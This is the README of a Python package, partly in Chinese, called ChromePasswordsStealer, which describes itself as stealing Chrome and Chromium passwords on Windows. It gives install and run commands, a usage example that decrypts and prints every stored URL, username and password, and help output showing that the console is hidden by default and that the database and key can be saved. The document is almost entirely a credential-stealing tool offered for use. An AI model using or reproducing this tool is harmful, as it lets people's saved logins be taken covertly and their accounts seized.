ChromePasswordsStealer
v1.0.1 ChromePasswordStealer
該模塊在Windows上竊取了Chrome和Chromium密碼。
此包需要:
pip install ChromePasswordsStealer # Python executable
python3 ChromePasswordsStealer.pyz -h
# or
chmod u+x ChromePasswordsStealer.pyz
./ChromePasswordsStealer.pyz --help
# Python module
python3 -m ChromePasswordsStealer
# Entry point (console)
ChromeStealer --save-all --window -f passwords from ChromePasswordsStealer import ChromePasswordsStealer
stealer = ChromePasswordsStealer ()
stealer = ChromiumPasswordsStealer ( "passwords" , True )
stealer . get_database_cursor ()
stealer . get_key ()
for url , username , password in stealer . get_credentials ():
print ( url , username , password )
stealer . save_and_clean () ~# python3 ChromePasswordsStealer.py -h
usage: ChromePasswordsStealer.py [-h] [--filename FILENAME] [--window] [--save-all]
This program steals Chrome passwords on Windows.
optional arguments:
-h, --help show this help message and exit
--filename FILENAME, -f FILENAME
The filename to export the credentials.
--window, -w Do not hide the console.
--save-all, -s Save chrome db, key file and key.
在GPL下獲得許可,版本3。